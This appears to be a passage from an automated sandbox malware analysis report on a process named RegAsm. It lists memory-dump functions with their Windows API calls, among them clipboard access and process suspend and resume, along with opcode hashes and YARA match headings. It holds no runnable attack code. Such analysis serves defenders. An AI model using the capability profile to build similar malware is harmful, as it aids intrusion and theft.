                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2058664381-0
                                                                                                                                                                                                  • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                                                                                                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3614150671-0
                                                                                                                                                                                                  • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                                                                                  • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                                                                                                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1999457699-0
                                                                                                                                                                                                  • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                                                  • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FeaturePresentProcessor
• String ID: MZ@
• API String ID: 2325560087-2978689999
• Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
• Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
• Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
• Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
Strings
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
• Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
• Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
• Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID: t'`/
• API String ID: 1663032902-2084328917
• Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
• Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
• Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
• Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: JD
• API String ID: 1084509184-2669065882
• Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
• Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
• Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
• Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
APIs
  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
• EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID: t'`/
• API String ID: 1272433827-2084328917
• Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
• Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
• Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
• Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
• Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
• Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
• Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
• Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
• Opcode Fuzzy Hash: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
• Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                                                                                                                  • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                  • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                                                                                                                                                  • Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2692324296-0
                                                                                                                                                                                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                                                                                  • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1084509184-0
                                                                                                                                                                                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                                                                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.2 Pro), ref: 0040F920
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                  • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                                                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 0-2084328917
                                                                                                                                                                                                  • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                                                                                                                                                  • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 0-2084328917
                                                                                                                                                                                                  • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                                                                                                                                                  • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
• Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
• Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
• Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
• Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
• Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
• Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
• Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
• Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
• Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
• Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
• Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
